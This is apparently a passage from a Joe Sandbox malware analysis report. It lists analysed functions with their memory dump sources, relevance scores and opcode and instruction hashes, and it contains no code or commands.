                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f51396ba19c7c34348a0bcb9acdff57e17b09e46938a581edd15893ce74f42fa
                                                                                              • Instruction ID: 67e5d4b498c5e36b83d98edecbb2e852c667959bac723ecb5d9995fb73ab898a
                                                                                              • Opcode Fuzzy Hash: f51396ba19c7c34348a0bcb9acdff57e17b09e46938a581edd15893ce74f42fa
                                                                                              • Instruction Fuzzy Hash: CB6159F3D092149BE304692DEC45366FBC9EBA0771F1B463DEE98D3780E8799D058286
                                                                                              Function 00B40650 Relevance: .2, Instructions: 194COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 938d95e6b3423e8aebc86549d9540cfc1628ac09a97084efa42e5a108ea0e0de
                                                                                              • Instruction ID: 4e3fe16ba9adfbb056b225036bc438dd6d15e8c9f90f5e47c6718930aaf27a59
                                                                                              • Opcode Fuzzy Hash: 938d95e6b3423e8aebc86549d9540cfc1628ac09a97084efa42e5a108ea0e0de
                                                                                              • Instruction Fuzzy Hash: 91515B37A2A5D04BC720597C0C902A86BD34BD633473F43EADAB5873D1C97A8E02A391
                                                                                              Function 00C0D8DA Relevance: .2, Instructions: 172COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2b12deb4905407cd216bc43e0ecfaa02281cf5050d1967444cea38ec18293c77
                                                                                              • Instruction ID: 7b3f46e85f5b401170d5992e49245a2ed0a95673de2a21f4a75a2ef7b75bb968
                                                                                              • Opcode Fuzzy Hash: 2b12deb4905407cd216bc43e0ecfaa02281cf5050d1967444cea38ec18293c77
                                                                                              • Instruction Fuzzy Hash: B44142B3A1C2006FF304593DEC95B7ABADADBD4320F69462DEB80C7784E874980142A6
                                                                                              Function 00BCD864 Relevance: .2, Instructions: 169COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 175f8e20981c3a2ec88f6a574ae9a7e0af1a2e3123a74d70e59dd20ba706b6f6
                                                                                              • Instruction ID: 53f0ce11a64e91f233d7303402f04675c83e4f61912a912c0c2504783488ed1d
                                                                                              • Opcode Fuzzy Hash: 175f8e20981c3a2ec88f6a574ae9a7e0af1a2e3123a74d70e59dd20ba706b6f6
                                                                                              • Instruction Fuzzy Hash: 144148F3F141241BE318A83DDD587A6BAC69BD4230F2B823ADA98D77C8EC794D0542C5
                                                                                              Function 00B527B0 Relevance: .1, Instructions: 126COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2c51dfc81f9eb7159e8b84b39cfd907100d21fb998d6ccfb7a541c122436882e
                                                                                              • Instruction ID: 0db5da81279b3e9cc22abbbaee5f662d5e70062557f664affe3c0f479e45e145
                                                                                              • Opcode Fuzzy Hash: 2c51dfc81f9eb7159e8b84b39cfd907100d21fb998d6ccfb7a541c122436882e
                                                                                              • Instruction Fuzzy Hash: BF814DB554A3848BC378CF15D99868BBBE1FB99308F504A6DD88C5B390CFB81449CF96
                                                                                              Function 00B227D0 Relevance: .1, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7a0d1d50d17c1da3c8b5f450d0bf25471cec8afde841c831002ff94e32f89af
                                                                                              • Instruction ID: e133ddd238db5b3e5150d05f79242f42e2dd1b577bf531ff1cc5d7a281f396f5
                                                                                              • Opcode Fuzzy Hash: a7a0d1d50d17c1da3c8b5f450d0bf25471cec8afde841c831002ff94e32f89af
                                                                                              • Instruction Fuzzy Hash: 8111C137B29A3257F754CF6AECD46166392EFC9310B1A0174EE49DB392CA76E801D1A0
                                                                                              Function 011DB9F8 Relevance: .1, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000003.2356614238.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_3_11d8000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 94cc2c33ca00b800bcedb886d9e103aca58b355ff95acfeab7d83426b30636fb
                                                                                              • Instruction ID: 6a8940c5955fe289d9caa18d3b1f4bb57af20e7ef437cf8330d7aaf34ee41558
                                                                                              • Opcode Fuzzy Hash: 94cc2c33ca00b800bcedb886d9e103aca58b355ff95acfeab7d83426b30636fb
                                                                                              • Instruction Fuzzy Hash: 4721FF7205A3C1AFCB52DF38C9D1A833F61AF4732474A82D8E4805E047D328A623CB92
                                                                                              Function 00B2BC9D Relevance: .0, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0632dcc78ae77015318d7bd03757a70775447f5e8f294755f20c48d332a76107
                                                                                              • Instruction ID: 6c25943b904d751b795639aeb33f349c4273c42a5a24523aefa18732976ec5f5
                                                                                              • Opcode Fuzzy Hash: 0632dcc78ae77015318d7bd03757a70775447f5e8f294755f20c48d332a76107
                                                                                              • Instruction Fuzzy Hash: 99F0E2706083804BD7288B24D891A3FB7B0EB82614F10142CE2C2C32D2DF65C8028A09
                                                                                              Function 00B5B860 Relevance: .0, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2e42bca153ac50d22658cffa21c4fbbd245cf6cb390caef70f216a1896c2c3cb
                                                                                              • Instruction ID: 18b9bdd77bc6cdfe36e46c9cae9776b1f3183f55cf64a3074e9eab53cbfdc923
                                                                                              • Opcode Fuzzy Hash: 2e42bca153ac50d22658cffa21c4fbbd245cf6cb390caef70f216a1896c2c3cb
                                                                                              • Instruction Fuzzy Hash: AEB01250B042087F00649D0A8C45D7BF7FED2CB684F107008F408A3354DAA0EC0482FD